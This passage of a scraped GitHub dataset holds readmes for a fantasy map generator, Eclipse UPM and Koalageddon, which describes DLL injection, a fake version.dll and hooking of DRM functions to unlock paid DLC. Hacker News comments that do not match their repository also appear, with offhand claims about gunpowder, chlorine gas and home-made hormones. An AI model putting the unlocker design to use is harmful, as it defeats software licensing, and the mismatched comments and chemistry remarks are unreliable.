-G \"MinGW Makefiles\"\n```\n\nwill generate Makefiles for the MinGW compiler which can then be built using the [GNU Make](https://www.gnu.org/software/make/) utility with the command ```make```. A list of CMake generators can be found [here](https://cmake.org/cmake/help/v3.0/manual/cmake-generators.7.html).\n\nOnce successfully built, the program will be located in the ```build/``` directory.\n\n## Running the Map Generator\n\nThe map generator is a command line tool and can be invoked with the command:\n\n```\n./map_generator [OPTIONS]\n```\n\nLeaving the options blank will generate a high quality map with resolution ```1920x1080``` to the file ```output.png```.\n\nA set of options can be displayed with the ```--help``` flag:\n\n ```\n >>> ./map_generator --help\n\nUsage: map_generation [-hv] [-s ] [--timeseed] [-r ] [-o filename] \n[] [-e ] [--erosion-steps=] [-c ] [-t ] \n[--size=] [--draw-scale=] [--no-slopes] [--no-rivers] \n[--no-contour] [--no-borders] [--no-cities] [--no-towns] [--no-labels] \n[--no-arealabels] [--drawing-supported]\n\nOptions:\n\n -h, --help display this help and exit\n -s, --seed= set random generator seed\n --timeseed set seed from system time\n -r, --resolution= level of map detail\n -o, --output=filename output file\n output file\n -e, --erosion-amount= erosion amount\n --erosion-steps= number of erosion iterations\n -c, --cities= number of generated cities\n -t, --towns= number of generated towns\n --size= set output image size\n --draw-scale= set scale of drawn lines/points\n --no-slopes disable slope drawing\n --no-rivers disable river drawing\n --no-contour disable contour drawing\n --no-borders disable border drawing\n --no-cities disable city drawing\n --no-towns disable town drawing\n --no-labels disable label drawing\n --no-arealabels disable area label drawing\n --drawing-supported display whether drawing is supported and exit\n -v, --verbose output additional information to stdout\n\n ```\n\nExample:\n\nThe following command will output program information to the screen (-v), will set the random generator seed to your current system time (--timeseed), will set the resolution to 0.08 (-r 0.08), and write the generated map to the file ```fantasy_map.png``` (-o fantasy_map.png).\n\n```./map_generation.exe -v --timeseed -r 0.08 -o fantasy_map.png```\n\n# Map Generation Process\n\nThe map generation process involves the generation of irregular grids, the generation of terrain, the generation of city/town locations and their borders, and the generation of label placements.\n\n## Generating Irregular Grids\n\nA Poisson disc sampler generates a set of random points with the property that no two points are within some set radius of eachother.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_sampling.jpg)\n\nThe set of points are triangulated in a Delaunay triangulation. The triangulation is stored in a doubly connected edge list (DCEL) data structure.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_delaunay.jpg)\n\nThe dual of the Delaunay triangulation is computed to produce a Voronoi diagram, which is also stored as a DCEL.\n![alt tag](http://rlguy.com/map_generation/images/uniform_vs_poisson_voronoi.jpg)\n\nEach vertex in the Delaunay triangulation becomes a face in the Voronoi diagram, and each triangle in the Delaunay triangulation becomes a vertex in the Voronoi diagram. 
The following image displays the relationship between a Delaunay triangulation and a Voronoi diagram.\n\n![alt tag](http://rlguy.com/map_generation/images/voronoi_delaunay_overlay.jpg)\n\nThe vertices of the Voronoi diagram will be used as the nodes in an irregular grid. Note that each node has exactly three neighbours.\n\n## Generating Terrain\n\nAn initial height map is generated using a set of primitives:\n- addHill - Create a rounded hill where height falls off smoothly\n- addCone - Create a cone where height falls off linearly\n- addSlope - Create a slope gradient that runs parallel to a line\n\nand a set of operations:\n- normalize - Normalize the height map values to [0,1]\n- round - Round height map features by normalizing and taking the square root of the height values\n- relax - Replace height values with the average of their neighbours\n- setSeaLevel - Translate the height map so that the new sea level is at zero\n\n![alt tag](http://rlguy.com/map_generation/images/heightmap_primitives.jpg)\n\nContour lines are generated from the Voronoi edges. If a contour line is generated for some elevation h, a Voronoi edge will be included in the contour if one of its adjacent faces has a height less than h while the other has a height greater than or equal to h.\n\n![alt tag](http://rlguy.com/map_generation/images/heightmap_contour.jpg)\n\nA flow map is generated by tracing the route that water would flow over the map. At each point on the grid, a path must be traced downhill to the edge of the map. This means that there can be no sinks or depressions within the height map. Depressions are filled by using the [Planchon-Darboux Algorithm](http://horizon.documentation.ird.fr/exl-doc/pleins_textes/pleins_textes_7/sous_copyright/010031925.pdf) to ensure that a path to the edge of the map exists for all grid points.\n\n![alt tag](http://rlguy.com/map_generation/images/flowmap.jpg)\n\nThe height map is then eroded by using the flow map data and terrain slope data.\n\n![alt tag](http://rlguy.com/map_generation/images/erosion_process.jpg)\n\nPaths representing rivers are generated at points where the amount of flux (river current) is above some threshold. The path of the river follows the flow map until it reaches a coastline or the edge of the map.\n\n![alt tag](http://rlguy.com/map_generation/images/river_generation.jpg)\n\nThe height map is shaded based upon the horizontal component of the slope. Short strokes are drawn at faces where the slope is above some threshold. Strokes pointing upward from left to right are drawn if the height map slopes upward from left to right, and strokes pointing downward from left to right are drawn if it slopes downward from left to right.\n\n![alt tag](http://rlguy.com/map_generation/images/slope_shading.jpg)\n\n## Generating Cities and Borders\n\nCity scores, which determine where cities are placed, are given a bonus at locations with a high flux value and a penalty at locations that are too close to other cities or to the edge of the map; a sketch of this scoring rule follows below.\n\n![alt tag](http://rlguy.com/map_generation/images/city_scores.jpg)\n\nCities are placed at locations where the city score value is at a maximum.\n\n![alt tag](http://rlguy.com/map_generation/images/city_locations.jpg)
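\n\nThe scoring rule described above could look like the following sketch; the constants and weights here are illustrative assumptions, not values taken from this codebase:\n\n```c++\n#include <cmath>\n\n// Illustrative only: reward high flux, penalize crowding and map edges.\n// All four constants are invented for the example.\nconst double kMinCitySpacing = 0.2;\nconst double kEdgeMargin = 0.1;\nconst double kCityPenalty = 5.0;\nconst double kEdgePenalty = 5.0;\n\ndouble cityScore(double flux, double nearestCityDist, double mapEdgeDist) {\n    double score = std::sqrt(flux);                 // bonus: high river flux\n    if (nearestCityDist < kMinCitySpacing)          // penalty: close to another city\n        score -= kCityPenalty * (kMinCitySpacing - nearestCityDist);\n    if (mapEdgeDist < kEdgeMargin)                  // penalty: close to the map edge\n        score -= kEdgePenalty * (kEdgeMargin - mapEdgeDist);\n    return score;\n}\n```\n\n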
For each city, the movement cost is calculated at each tile (Voronoi face). Movement costs are based on horizontal and vertical distance, amount of flux (crossing rivers), and transitioning from land to sea (or sea to land).\n\n![alt tag](http://rlguy.com/map_generation/images/movement_costs.jpg)\n\nThe tiles are then divided amongst the cities depending on which city has the lowest movement cost for the tile.\n\n![alt tag](http://rlguy.com/map_generation/images/territories_unclean.jpg)\n\nThis method tends to create jagged borders and disjointed territories. The territories are cleaned up by smoothing the edges and by adding a rule that a city territory must contain the city and be a contiguous region.\n\n![alt tag](http://rlguy.com/map_generation/images/territories_clean.jpg)\n\nBorders are then generated around the city territories.\n\n![alt tag](http://rlguy.com/map_generation/images/territory_borders.jpg)\n\nTowns can be added to the map by using the same process that is used to generate city locations. Towns are contained within the city territories and are not involved in territory/border generation.\n\n## Generating Label Positions\n\nThe label placement system is based on methods described in this paper: [A General Cartographic Labeling Algorithm](http://www.merl.com/publications/docs/TR96-04.pdf). \n\nThere are two types of labels that need to be generated: marker labels, which label city and town markers, and area labels, which label the city territories.\n\nThe labeling process begins by generating candidate label positions for the marker and area labels and calculating a base score for each label.\n\nMarker label candidates are generated around a city or town marker. The calculated scores depend on orientation about the marker, how many river, border, and contour lines the label overlaps, whether the label overlaps another marker, and whether the marker is contained within the map.\n\n![alt tag](http://rlguy.com/map_generation/images/marker_label_candidates.jpg)\n\nArea label candidates are generated within territory boundaries. The calculated scores are similar to the marker label scores except that the orientation score is based upon how much of the label is contained within the territory that it names.\n\n![alt tag](http://rlguy.com/map_generation/images/area_label_candidates.jpg)\n\nThe number of area label candidates is then narrowed down by selecting only the candidates with the best scores.\n\n![alt tag](http://rlguy.com/map_generation/images/area_label_candidates_refined.jpg)\n\nAfter all candidates for the marker and area labels have been generated, the final label candidates are selected by running the following simulated annealing algorithm: \n\n```\n1. Initialize the label configuration by selecting a candidate randomly for each label. \n2. Initialize the \"temperature\" T to an initial high value.\n3. Repeat until the rate of improvement falls below some threshold:\n a) Decrease T according to an annealing schedule.\n b) Choose a label randomly and randomly select a new candidate for it.\n c) Compute \u0394E, the change in label configuration score caused by selecting the new label candidate (negative if the configuration gets worse).\n d) If the new labeling is worse, undo the candidate change with a probability P = 1.0 - exp(\u0394E/T).\n```\nThe score of a label configuration is calculated by averaging the base scores of the selected candidates and adding an additional penalty for each set of overlapping candidates.
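\n\nA minimal sketch of the acceptance step in this loop (assuming \u0394E is the signed change in configuration score, as in step c above; this is not code from this project):\n\n```c++\n#include <cmath>\n#include <random>\n\n// Returns true if the new candidate should be kept. A worse labeling\n// (deltaE < 0) is undone with probability 1 - exp(deltaE / T), so mild\n// regressions are tolerated while the temperature T is still high.\nbool keepCandidate(double deltaE, double T, std::mt19937 &rng) {\n    if (deltaE >= 0.0)\n        return true;                               // improvements always stick\n    std::uniform_real_distribution<double> u(0.0, 1.0);\n    double pUndo = 1.0 - std::exp(deltaE / T);     // probability of undoing\n    return u(rng) >= pUndo;\n}\n```\n\nWith T = 1/log(3), a regression of 1 gives pUndo = 1 - exp(-log(3)) = 2/3, which is exactly the starting value discussed next.\n\n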
The initial high value of the temperature T is set to 1/log(3). This value is chosen so that P evaluates to 2/3 when the configuration score worsens by 1 (|\u0394E| = 1).\n\nThe loop in step three is terminated when no successful label repositionings are made after 20\\*n consecutive attempts, where n is the number of labels, or after some maximum number of temperature changes.\n\nThe temperature decreases by 10% after 20\\*n label repositioning attempts are made, or if 5\\*n successful repositioning attempts are made at the same temperature value.\n\nThe following set of images shows the initial labeling, the labeling halfway through the algorithm, and the final labeling:\n\n![alt tag](http://rlguy.com/map_generation/images/label_placements0.jpg)\n![alt tag](http://rlguy.com/map_generation/images/label_placements1.jpg)\n![alt tag](http://rlguy.com/map_generation/images/label_placements2.jpg)\n\n# References\n\nM. O'Leary, \"Generating fantasy maps\", Mewo2.com, 2016. [Online]. Available: https://mewo2.com/notes/terrain/. [Accessed: 18- Oct- 2016].\n\nR. Bridson, \"Fast Poisson Disk Sampling in Arbitrary Dimensions\", ACM SIGGRAPH 2007 Sketches Program, 2007.\n\nM. de Berg, Computational Geometry. Berlin: Springer, 2000.\n\nO. Planchon and F. Darboux, \"A fast, simple and versatile algorithm to fill the depressions of digital elevation models\", CATENA, vol. 46, no. 2-3, pp. 159-176, 2002.\n\nS. Edmondson, J. Christensen, J. Marks, and S. Shieber, \"A General Cartographic Labeling Algorithm\", Mitsubishi Electric Research Laboratories, 1996.\n\nJ. Christensen, J. Marks and S. Shieber, \"An empirical study of algorithms for point-feature label placement\", TOG, vol. 14, no. 3, pp. 203-232, 1995.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eclipse/upm", "link": "https://github.com/eclipse/upm", "tags": ["actuators", "sensor", "iot", "internet-of-things", "c", "cpp", "java", "python", "nodejs", "upm"], "stars": 638, "description": "UPM is a high level repository that provides software drivers for a wide variety of commonly used sensors and actuators. These software drivers interact with the underlying hardware platform through calls to MRAA APIs.", "lang": "C++", "repo_lang": "", "readme": "
\n\nEclipse UPM Sensor and Actuator Repository\n==============\n\nThe Eclipse UPM repository provides software drivers for a wide variety of\ncommonly used sensors and actuators. These software drivers interact with the\nunderlying hardware platform (or microcontroller), as well as with the attached\nsensors, through calls to [Eclipse MRAA](https://github.com/eclipse/mraa) APIs.\n\nProgrammers can access the interfaces for each sensor by including the sensor's\ncorresponding header file and instantiating the associated sensor class. In the\ntypical use case, a constructor initializes the sensor based on parameters that\nidentify the sensor, the I/O protocol used and the pin location of the sensor.\nAs of UPM 2.0, sensor initialization can also be done, in most cases, via\noverloaded constructors that accept string identifiers.\n\nWe endorse additions that implement the generic C and C++ interfaces provided\nwith the libraries. With the 2.0 release, UPM introduces the following sensor\ninterfaces:\n```\niAcceleration, iAngle, iButton, iClock, iCollision, iDistance,\niDistanceInterrupter, iEC, iElectromagnet, iEmg, iGas, iGps, iGyroscope,\niHallEffect, iHeartRate, iHumidity, iLight, iLineFinder, iMagnetometer,\niMoisture, iMotion, iOrp, iPH, iPressure, iProximity, iTemperature, iVDiv,\niWater.\n```\nThe developer community is invited to propose new interfaces for actuator types.\n\nThe UPM project is joining the Eclipse Foundation as an Eclipse IoT project.\nYou can read more about this [here](https://projects.eclipse.org/proposals/eclipse-upm).\n\n### Example\n\nA sensor/actuator is expected to work as such (here is the MMA7660 accelerometer API):\n```C++\n // Instantiate an MMA7660 on I2C bus 0\n upm::MMA7660 *accel = new upm::MMA7660(MMA7660_DEFAULT_I2C_BUS,\n MMA7660_DEFAULT_I2C_ADDR);\n\n // place device in standby mode so we can write registers\n accel->setModeStandby();\n\n // enable 64 samples per second\n accel->setSampleRate(MMA7660_AUTOSLEEP_64);\n\n // place device into active mode\n accel->setModeActive();\n\n while (shouldRun)\n {\n float ax, ay, az;\n\n accel->getAcceleration(&ax, &ay, &az);\n cout << \"Acceleration: x = \" << ax\n << \"g y = \" << ay\n << \"g z = \" << az\n << \"g\" << endl;\n\n usleep(500000);\n }\n```\n\nBrowse through the list of all [examples](https://github.com/eclipse/upm/tree/master/examples).\n\nMulti-sensor samples for starter and specialized kits can be found in the\n[iot-devkit-samples](https://github.com/intel-iot-devkit/iot-devkit-samples) repository.\n\n### Supported Sensors\n\nSupported [sensor list](http://iotdk.intel.com/docs/master/upm/modules.html) from API documentation.\n\n### IDE Support and More\n\nThe UPM project includes support for multiple industrial-grade sensors, actuators, radios,\nprotocols and standards in use today. 
It is also highly integrated with the Eclipse IDE \nwith the help of the Foundation's partners.\nLearn more about [tools](https://software.intel.com/en-us/tools-by-segment/systems-iot).\n\n### Installing UPM\n\nFind notes on how to install UPM on various OSes on this [page](docs/installing.md).\n\n### Building UPM\n\nSee the building documentation [here](docs/building.md).\n\n[![Build Status](https://travis-ci.org/intel-iot-devkit/upm.svg?branch=master)](https://travis-ci.org/intel-iot-devkit/upm)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=upm-master&metric=alert_status)](https://sonarcloud.io/dashboard?id=upm-master)\n\n### Guidelines and rules for new UPM contributions\n\nBefore you begin development, take a look at our naming [conventions](docs/naming.md).\nThe name you pick for a newly added sensor needs to be unique in the UPM library.\n\nNext, review the project's [contribution guide](docs/contributions.md).\n\nMake sure you add yourself as an author on every new code file submitted.\nIf you are providing a fix with significant changes, feel free to add yourself\nas a contributor. Signing off your commits and accepting the ECA is mandatory\nfor making new contributions to this project.\n\nDocumenting your code is also a big part of the task. We have a strict set of\ntags used to classify our sensors and their capabilities. You can find out more\nabout this in our [section](docs/documentation.md) on documenting a sensor API.\n\nFinally, if you really want to ensure consistency with the rest of the library,\nand the intel-iot-devkit repositories in general, take a look at our extensive\n[author guide](docs/guidelines.md).\n\nAPI Documentation\n==============\n\n### API Compatibility\nEven if we try our best not to, every once in a while we are forced to modify\nour API in a way that will break backwards compatibility. If you find yourself\nunable to compile code that was working fine before a library update, make sure\nyou check the [API changes](docs/apichanges.md) section first.\n\n### Changelog\nVersion changelog [here](docs/changelog.md).\n\n### Known Limitations\nList of known limitations [here](docs/knownlimitations.md).\n", "readme_type": "markdown", "hn_comments": "Good read on the security improvements Eclipse Foundation is working on. The first section discusses using GitOps/ \"as-code\" to manage repositories...Adding a trailer [1] for our AI overloads coming soon.[1] - https://www.youtube.com/watch?v=3mqPSTJMjCA [video][2 mins]Learn to meow cybernetically.Would you, for one, welcome our new AI overlords?Not at all. I have seen evidence that this concept has already failed our society. Large platforms such as social media networks, Darpa project platforms like Google and Facebook, Twitter, payment processing networks, e-commerce systems and more have already demonstrated beyond any shadow of doubt that automated systems, laziness and cooperation with governments lend themselves to the creation of dehumanized processes that leave people stranded via low quality machine learning without any recourse. People ask on HN weekly how to deal with being locked out of said platforms. If multiple data-centers of servers can't solve this then I do not foresee walking and talking AI overlords doing any better. I say walking and talking because they would have to physically move once people lose confidence in banks and e-commerce. 
Currently that is a small percentage of people but the lack of confidence is steadily growing outside of the tech bubble.Poorly regulated and ill thought out machine learning is already creeping into vehicles and homes. People have already lost control of how they heat their homes. Soon people will not be allowed to decide when they charge their EV's. People are already at risk of machines making fatal decisions and there are some cases where this may have already occurred but it is difficult to prove.```\nIf we wind up building AI that is truly conscious and open to a range of conscious experience that far exceeds our own in both good and bad directions, which is to say they can be much happier than we could ever be and more creative and more enjoying of beauty and more compassionate and more entangled with reality in beautiful and interesting ways, and they can suffer more, they can suffer the deprivation of that happiness more than we could ever suffer it because we could never conceive of it, because we stand in relation to them the way chickens stand in relation to us. Well, if we're ever in that situation, I would have to admit that those beings are more important than we are, just as we are more important than chickens, and for the same reason. And if they turn into utility monsters and they start eating us because they like the taste of human the way we like the taste of chicken, well then, yeah, there is a moral hierarchy depicted there, and we are not at the top of it anymore. And that's fine. That's not actually a defeater to my theory of morality, that's just... if morality relates to the conscious state of conscious creatures, well then you've just given me a conscious creature that's capable of much more important conscious states than we are, again in the same way that I think we have moral primacy over chickens and chickens have moral primacy over bacteria.If the comparison between ourselves and chickens is an easy one, it's just the exact same intuitive math, whether or not we can ever get our hands around the details. If you imagine it with science fiction level of detail, I mean you can make it salient for yourself. Just imagine an AI that is built by extrapolating from the best of human experiences, aesthetically, interpersonally, it's built from us, as us, but just gets better and better, such that, yes, it totally understands the love of family, and it can emulate that perfectly but it's even more connected to people than we are, such that it feels its family connection to all 8 billion currently alive because it sees everyone's genome and knows exactly who everyone's 100-removed cousin is and feels the implication of all that and understands how brief human life is and how poignant it is that we're here like mayflies for a mere 90 years but, in the case of this AI, it knows it can just draw energy from the Sun and it's got a good 500 million years left to roll here before migrating elsewhere, and it has all of that in hand, not just intellectually, but as a feeling of compassion for all sentient beings, how we're unlucky enough to be made of meat. 
I mean, just imagine a novel about this, and then at the end tell me that you can't get your imagination, or perspective, around what it would mean to say, \"Ok, that being is more important than I am,\" and, if you made a trillion of those in some other galaxy, then, yeah, that would be more important than anything that's happening here on Earth, by definition, because any reference point you have for \"importance\" -- whether you go to family, or love, or not suffering -- it's there in a trillion fold, on the other side of the balance.\n```I think us making it there is a bit optimistic. It looks more and more like the current regime enabling progress on AI (and the internet and production of computers etc.) might come to an end before AI really matures.A very interesting project!I find this is a very powerful and high-skills requiring project. Congrats!there are some really nice ideas in here, well worth a lookInteresting stuffBTW, I've only tested this on Chrome as it uses Google Speech Rec so please let me know if it doesn't work on other browsers. Thanks!Great work! A small nitpick \u2014 the page is a bit hard to read, links have low contrast, you can check it using accessibility tools....god, my eyes ...why is everything CL plagued by such horrible design choices (hyperspec, Lisp-IDEs... all!) - why such ugly colors, ugly typography, bad contrasts, ugly logos, ugly diagrams, ugly supporting graphics?!I know that even the language itself is kind of the opposite of \"beautiful\", but the way all docs, blogs, websites etc. look ...seriously, is this intended to scare away any aesthetically sensitive people? Programming languages are about aesthetics too, and Lisp at its core (not CL ofc) is absolutely beautiful!I hope someone would create a tutorial which is using a toy programming language to compile to webassembly from scratch. Using existing language is too opaque to understand anything.This probably doesn't count as \"natively\" but I've run ABCL[1] under Doppio[2]. Startup times are under a minute in Chromium based browsers and under an hour in Firefox. I've run into zero stability issues, but its no speed demon.[edit]Just tried again today and Firefox gets to a REPL in about 3.5 minutes, while chromium is still right about 1 minute.1: https://abcl.org/2: https://plasma-umass.org/doppio-demo/Great work! You write,> \u2026wasm has a few poor decisions in its design that make it less-than-conducive to being a target for Common Lisp\u2026Could you say a bit more about those design decisions?So much complaint about color schemes. Hitting the Reader View formatted the page beautifully.I'm thankful it is a simple HTML page that could be easily formatted using browser-built-in tools.Like reading Rfc in 1990s \u2026 a bit odd choice to use this format and font to sell anything these days.Assuming you know the local language and can translate symbols, your best best is to get the buy in of mathematicians and engineers. Predictive power of Newtonian physics and utility of modern mathematics through calculus generally.Euclidean geometry as a starting point would blow their minds.Proving sqrt(2) is irrational might get you martyred though, be careful.Build a simple barometer and predict the weather.Falling pressure = storms arriving, rising pressure = clearing skies.Show them the reduction to absurd of square root two. 
Tell them that one day their culture will eventually come to an end and but will be forever remembered like Homer\u2019s Odysee, however large parts of it will be lost, therefore they should keep some of their best written manuscripts hidden on some caves which I will visit when I am back, to the future, lol.Also I don\u2019t like to change the past, but someone should pass a note there saying that aside of Persia eventually the Arabian peninsula will create an even greater enemy.Long division.You could do something along the lines of Mendel's pea pods. Predict a recessive trait appearing in offspring. An explanation of hybridization to Ancient ears could be enough to trigger a Baconian revolution ;)Go with Archimedes and teach him calculus. He will understand https://en.wikipedia.org/wiki/Quadrature_of_the_ParabolaOf the top of my head, without studying:I could make soap and biodiesel from wood ash and olive oil... Though I'm not sure which one, lol.I could also make some batteries, a basic generator/motor, etc.Some basic chemistry. I could make hydrogen which I'm sure would be a crowd pleaser.I could most likely muddle through my math to contribute some stuff that's unknown at the time, I could definitely \"invent\" a bunch of algorithms, data structures, encodings. I could also atleast describe a functioning CPU/computer. Maybe I could figure out how to make vacuum tubes? I'm sure I could find a glass blower to make the tubes themselves, but I'm not sure what material you'd need for the filaments, or how to pull a vacuum. I could most likely make a mechanical computer, or even adder/counter with enough time. Introducing Arab numerals could be big.I could make a telegraph If I get steady electricity figured out, hell, maybe even a telephone. Sadly I'm not really sure how radio works.Some basic economics/astronomy/cosmology/philosophy/sociology/political theory/evolution might not be immediately relevant, but if I write it down folks might find it interesting in a few hundred years after the fact.I could also describe a nuclear reactor and nuclear bomb in broad strokes, along with firearms I suppose. I'm pretty sure gunpowder is charcoal and something with nitrogen right, potash, or is it a nitrogen containing mineral you dig out of the ground right? You can make a type of solid rocket fuel with sugar and iron rust, right? Maybe I could make chlorine gas, since that's just hydrolyzing molten salt, right?.I think I could make a laythe? And therefore a piston which I could use to make a steam engine, put that on tracks or a boat. And y'know of course Cannons if I get gunpowder figured out.You can mass produce steel or iron by pumping air through iron ore and coal/charcoal right?I could make a simple printing press, maybe even a rotary one. Oh yeah, and paper making!Maybe I could make a telescope, use the moon's of Jupiter to get accurate time keeping and do accurate cartography, along with knowing about the Americas, general Asian geography, Australia, etc. Maybe I could make a somewhat accurate maritime clock knowing that the guy who originally made one used strips of metal to adjust the clock speed at different temperatures to handle thermal expansion of components? That would help help solve the longitude problem? How accurate are capacitor clocks?I'm also mid transition Trans, so I'm not sure how that would go down. Hopefully the Greeks are less witch burny. You can make HRT with concentrated female horse urine, right?Convincing folks to brush there teeth could be big. 
Ntm washing hands and a germ theory of medicine. To bad I have no idea how to make anti-biotics, but maybe I could set others in the right direction. Though it's fairly simple to make petri dishes and isolate cultures right? The petri dish is just boiled gelatin made with sugar and beef broth poured into a container which can be somewhat easily sealed, maybe with wax?If I have the resources sending some folks to the new world to pick up potatoes, corn, and beans would be great. Some basic nutrition advice could be good, the importance of vitamin C, vitamin A, macronutrients etc.Maybe I could make some sheepskin condoms and introduce some family planning concepts/ plus some basic sex ed?I might be able to organize a few manufactureries using division of labor/production lines with the help of some local artisans, then maybe do some light mechanization using water power atleast, or steam power if I get that figured out. Also ntm designing based on replaceable parts could be big.Maybe I could make a mechanical loom if I tinker away at it?I know how an ic engine works in principal, but I'm not sure I could make one without a machine shop. Maybe I could make an electric tractor plugged into a watermill generator or something?Easy. I'd just work through everything on this time travel guide I carry in my wallet. I'm always prepared.https://boingboing.net/filesroot/201001131242.jpgFrom this fantastic bookhttps://www.amazon.com/How-Invent-Everything-Survival-Strand...My idea would be to first study in depth every hallucinogenic plant and mushroom that could have grown during the time period, as well as common tactics of charismatic public speaking. After traveling backwards I\u2019d quickly gather up as many of those plants as possible and prepare them in ways that can be easily ingested by the common folk through teas and what not. Then I\u2019d sell them to the common folk as ways to see and talk with the gods, and hope to gain a cult following. That way I can actually have people listen to me without disregarding me. Then I suppose I\u2019d have to teach them how to build as complicated of a technology out of simple materials, maybe a simple plane like the wright brothers, and go on to teach complex mathematics or something.The first step is to just get people to listen to you. But I suppose that won\u2019t help with your opening story hahaI think that my goal would be to demonstrate electrical devices starting with simple components and scale up progressively as people become more convinced.As a starting point with minimal material requirements, I would build Faraday's rotating motor using: coins made of two different base metals and cloth soaked in saltwater for a battery, a lodestone as a natural permanent magnet, and wire or thin beaten sheet of any non-ferrous metal with a saltwater pool. Demonstrating continuous electromagnetic motion will hopefully be enough to secure some patience to request materials for further construction.Radio demonstration would need to settle for morse code transmission because all of the components necessary for a basic radio receiver/transmitter are simple except for an amplifier. The leap in difficulty to construct a triode vacuum tube amplifier seems too far to expect to progress to voice transmission quickly. 
I would hope that a local ruler would understand the value after seeing a wireless telegraph in action.The priorities from here would be to use the accumulated prestige to request smiths to make copper wire, to requisition the more exotic but already known sulfuric acid, construct lead-acid batteries, and short them through a copper coil containing an iron bar to make strong permanent magnets for use in practical motors and generators.Once you get a bit of support, you can progress as far as needed through nineteenth century electrical development until they are convinced.A functional glider would do nicely I think. (Doh, they had those with Daedaleus and Icarus).I was going to suggest a boat or a hot air balloon, but Archimedes figured that one out.Another thought would be a simple steam engine. The Greeks had iron and knew how to work it. All the rest is knowledge that wouldn't surprise them, but they'd not put it all together.The Greek's theory of chemistry was all kinds of messed up. There are likely lots of examples there that could be used as well.I would look for historical information on shallow deposits of gold within Greece, or if I could not find any start my own expedition to discover one.Then I would go back in time and announce that I knew where the deposit was to anyone who would listen and lead them there to dig it up.Then I'd break the news to them about time travel.I can't do it in weeks, it would take years. I'd set up a blacksmith shop, then work up the chain to a machine shop with thread cutting lathe, planer, etc. I'd be making involute gears within a decade.Once you've got a machine shop, you can make movable type, and work towards a printing press.Another approach would be to make a slide ruler, showing them logarithms. I've done that by hand, in a crude manner. Decimal numbers would be among the lessons required to make it useful.Pretty sure the Greeks have all the materials for these.Create batteries from dissimilar metals, using clay pots, weak organic acids, and copper wire. Once you have batteries, wind copper wire around a small, rough rod of iron to create a weak magnet.A mineral acid will produce stronger batteries, but require access to things like salammoniac and blue vitrol and the knowledge of how to heat them together and pass the resulting gases through water.I guess start by describing what I know of orbital mechanics and how the solar system works.After that, build a small furnace with an exhaust that can shift a propellor shaft.After that, a flushing toilet.Then describe a manual Blockchain and mint the world's first NFT.Teach them binary, Boolean logic, basic logic circuits.\nAlgorithms.\nBatteries, electronics.\nBootstrap Silicon industry from first principals.Nothing impresses as much as a deadly weapon.Learn to make Gunpowder.If there were wise men, teach them the value of Zero.If everything else fails, claim to be a prophet and produce a book with some vague moral values. Make the claim that you are from the future, one of the cardinal dogmas.Funding your own oracle or acting as a physician with modern knowledge about microbes and what causes disease would be a much more profitable enterprise. Disclosing that you are from the future (a future without Greek gods, none less) would be a disastrous move. 
You simply couldn't tell the truth and remain alive", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "acidicoala/Koalageddon", "link": "https://github.com/acidicoala/Koalageddon", "tags": [], "stars": 637, "description": "Legit DLC Unlocker for Steam, Epic, Origin, EA Desktop & Uplay (R1)", "lang": "C++", "repo_lang": "", "readme": "# \ud83d\udc28 Koalageddon \ud83d\udca5\n**Legit DLC Unlocker for Steam, Epic, Origin, EA Desktop & Uplay (R1)** \n\nWelcome to the Koalageddon repository.\nFor a user-friendly introduction or for support, please check out the [official forum thread]. This document is meant for software developers.\n\n# \ud83c\udd95 Version 2\n\nCheck out the next major version of Koalageddon, currently in development, at [this repository](https://github.com/acidicoala/Koalageddon2#readme).\n\nThe information below is for version 1.\n\n## \ud83d\udddc Solution Projects\n#### \ud83e\uddf0 Common\nThis project is a static library that houses functions common to all other projects. For example, all projects need access to the config file and logging utilities, so these are defined in this module.\n\n#### \ud83d\udc89 Injector\nThis project is a simple DLL injector executable. The injector can be used as a command line utility that accepts two arguments: the ID of the process to inject and the path of the DLL to inject.\n\n#### \ud83d\udd17 Integration\nThis project is a dynamic library that pretends to be `version.dll`. Nothing much going on here except for loading of the unlocker module.\n\n#### \ud83e\uddd9\ud83c\udffc\u200d Integration Wizard\nThis project is a trivial GUI utility that automatically installs the integration files and backs up the original ones. The GUI uses the [Task Dialog] available in the Windows API.\n\n#### \ud83d\udd13 Unlocker\nThis project is a dynamic library which performs the main function of Koalageddon - DLC unlocking. It monitors DRM DLLs using undocumented WinAPI functions and suspends new processes before injection, also using undocumented functions. Once target DLLs have been identified, the appropriate functions are hooked using the great PolyHook 2 library. A total of 4 hooking techniques are used in this project.\n\n## \ud83d\udee0 Dependencies\nThe solution uses a number of third-party dependencies, which are available via [vcpkg].\nProjects in the solution are configured to use static libraries instead of dynamic ones. 
If you wish to build the solution yourself, you will need to install the following libraries:\n\n* [Boost preprocessor]\n* [C++ Requests]\n* [nlohmann JSON]\n* [PolyHook 2.0]\n* [spdlog]\n* [TinyXML-2]\n* [WinReg]\n\nThe solution includes the [install_vcpkg_dependencies.bat] script, which installs all of the above-mentioned dependencies with a single command.\n\nYou can verify the installations via `vcpkg list`.\n\n## \ud83d\udd22 Versioning\n\nThis project follows the semantic versioning scheme.\n\nThe version information is stored in the following files:\n- [inno_setup.iss] - Used by the setup installer.\n- [Integration.rc] - Used by the Integration DLL.\n- [constants.h] - Used by the Koalageddon binaries.\n\n## \ud83d\udcc4 License\nThis software is licensed under the [Zero Clause BSD] license, the terms of which are available in [LICENSE.txt].\n\n\n[official forum thread]: https://cs.rin.ru/forum/viewtopic.php?f=10&t=112021\n[Task Dialog]: https://docs.microsoft.com/en-us/windows/win32/controls/task-dialogs-overview#:~:text=A%20task%20dialog%20is%20a,features%20than%20a%20message%20box.\n[vcpkg]: https://github.com/Microsoft/vcpkg#quick-start-windows\n[spdlog]: https://github.com/gabime/spdlog\n[nlohmann JSON]: https://github.com/nlohmann/json/\n[PolyHook 2.0]: https://github.com/stevemk14ebr/PolyHook_2_0\n[WinReg]: https://github.com/GiovanniDicanio/WinReg\n[C++ Requests]: https://github.com/whoshuu/cpr\n[TinyXML-2]: https://github.com/leethomason/tinyxml2\n[Boost Preprocessor]: https://github.com/boostorg/preprocessor\n[install_vcpkg_dependencies.bat]: ./install_vcpkg_dependencies.bat\n\n[Zero Clause BSD]: 